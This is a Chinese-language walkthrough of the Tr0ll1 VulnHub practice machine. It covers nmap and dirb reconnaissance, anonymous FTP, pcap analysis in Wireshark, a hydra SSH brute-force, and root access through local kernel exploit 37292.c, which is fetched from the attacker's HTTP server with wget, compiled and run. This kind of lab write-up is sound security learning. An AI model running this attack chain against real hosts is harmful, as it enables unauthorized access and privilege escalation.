Tr0ll1 vulnhub靶场通关记录（FTP）

目标：获取root权限并取得flag
kali攻击机ip：192.168.181.129

主机发现

nmap -sP 192.168.181.0/24

端口扫描

nmap -p 1-65535 -A 192.168.181.154

查看80端口

扫一扫网站目录

dirb http://192.168.181.154

东西好少

都访问一下

好了，没用，换个方向
还有一个ftp

FTP 即 文件传输协议（英语：File Transfer Protocol
的缩写）是一个用于计算机网络上在客户端和服务器之间进行文件传输的应用层协议。完整的 FTP 是由 FTP 服务器 和 FTP 客户端组成的，客户端可以将本地的文件通过 FTP
协议上传到服务器，也可以将服务器的文件下载到本地。它是当今使用的最古老的文件传输协议之一，是一种非常便捷的移动文件的方式。

匿名FTP

默认状态下，FTP 站点允许匿名访问，FTP
服务器接受对该资源的所有请求，并且不提示用户输入用户名或密码。如果站点中存储有重要的或敏感的信息，只允许授权用户访问，应禁止匿名访问。

使用FTP时必须首先登录，在远程主机上获得相应的权限以后，方可下载或上传文件。也就是说，要想同哪一台计算机传送文件，就必须具有哪一台计算机的适当授权。换言之，除非有用户ID和口令，否则便无法传送文件。这种情况违背了Internet的开放性，Internet上的FTP主机何止千万，不可能要求每个用户在每一台主机上都拥有帐号。匿名FTP就是为解决这个问题而产生的。

匿名FTP是这样一种机制，用户可通过它连接到远程主机上，并从其下载文件，而无需成为其注册用户。系统管理员建立了一个特殊的用户ID，名为anonymous，密码为空，
Internet上的任何人在任何地方都可使用该用户ID。

通过FTP程序连接匿名FTP主机的方式同连接普通FTP主机的方式差不多，只是在要求提供用户标识ID时必须输入anonymous，该用户ID的口令可以是任意的字符串。习惯上，用自己的E-mail地址作为口令，使系统维护程序能够记录下来谁在存取这些文件。

值得注意的是，匿名FTP不适用于所有Internet主机，它只适用于那些提供了这项服务的主机。

当远程主机提供匿名FTP服务时，会指定某些目录向公众开放，允许匿名存取。系统中的其余目录则处于隐匿状态。作为一种安全措施，大多数匿名FTP主机都允许用户从其下载文件，而不允许用户向其上传文件，也就是说，用户可将匿名FTP主机上的所有文件全部拷贝到自己的机器上，但不能将自己机器上的任何一个文件拷贝至匿名FTP主机上。即使有些匿名FTP主机确实允许用户上传文件，用户也只能将文件上传至某一指定上传目录中。随后，系统管理员会去检查这些文件，他会将这些文件移至另一个公共下载目录中，供其他用户下载，利用这种方式，远程主机的用户得到了保护，避免了有人上传有问题的文件，如带病毒的文件。

匿名登录

ftp 192.168.181.154
anonymous

密码直接回车

ls查看目录，发现了一个pcap文件
使用get下载，在哪打开ftp的就会下载到哪个目录

get lol.pcap

Pcap是 Packet Capture 的英文缩写，是一种行业标准的网络数据包捕获格式。

可以使用wireshark等工具打开文件查看里面的网络数据报

在kali文件系统双击打开（前提是kali里面安装了wireshark）

打开就是这样

我也是刚刚接触这个，每个东西都研究一下，顺便记录下来（不一定跟这靶机有关哈）

j就是这俩在通信

TCP三次握手

这里是登录的信息

如果只想看某种信息，可以选择过滤
在这条框框上面点击右键，选第一个

选好要过滤的字段名，这里我想查看ftp协议的数据

然后点这个箭头

这就好了

SYST(获取服务器的操作系统)

PORT(客户端请求服务端连接端口)

LIST(列出指定目录中的子目录和文件信息，如果没有指定目录则列出当前目录下的所有子目录和文件信息并返回客户端)

这里后面应该有个数据文件返回，取消过滤看看

果然，有个ftp data，双击查看

发现了一个secret_stuff.txt文件，可是看不到内容

RETR (下载文件)

客户端给服务器发送下载请求，经过三次握手后，通过ftp-data协议传输文件

双击下面那个txt数据报

查看到了传输的文本数据，提示我们一个字符串 sup3rs3cr3tdirlol

不知道是啥，可能是密码，用户名，或者网站目录文件

现在也没地方登录，那就试试网站

不负众望，有东西
一个不知名文件，下载到kali上查看

首先看看是什么类型的文件

file roflmao

可以看出来是可执行文件exe

那就执行看看

先给它授权

chmod +x roflmao

./roflmao

发现了一个地址，继续在网站上查看

分别查看文件夹

第一个文件夹看名字里面是一个已登录账号的txt文件

复制到下来作为爆破的字典

第二个文件夹名字里说文件夹里面是密码，打开是个txt文件，也做成密码字典

开放了22端口，顺理成章使用hydra爆破

但是我在尝试爆破的过程中，多次失败，hydra显示连接不上ssh，查看22端口发现竟然隐藏了，上网查找也没有什么解决方法，只能使用重启大法，再多试几次，就成了

hydra -L usertr0ll -p Pass.txt 192.168.154 ssh

因为失败太多，过程就不贴图片了，直接说结果，密码不是那个txt里的什么goodjob，直接是Pass.txt，用户是overflow

什么破脑洞 =_=

成功登录，但是当我到处翻翻找找的时候，发现被强制登出了

发现这玩意还是限时的，要抓紧时间

sudo -l 没有反应，find找不到有用的

那就从版本内核下手了

searchsploit ubuntu 3.13

就第一条，正合我心意

下载下来

cp /usr/share/exploitdb/exploits/linux/local/37292.c  /home/user

kali开启http服务

python -m http.server 80

重连ssh，cd到/tmp目录，下载文件

可以弄个回显

 python -c 'import pty;pty.spawn("/bin/bash")'\; 

下载.c文件后gcc编译，授权，执行
速度要快！

cd /tmp
wget http://192.168.181.129:80/37292.c
gcc 37292.c -o  37292
chmod +x 37292
./37292

提权成功~~

直接把root密码改了，再在VMware登录，就不用在这赶时间了

passwd root

进入/root目录
找到flag

o了 😃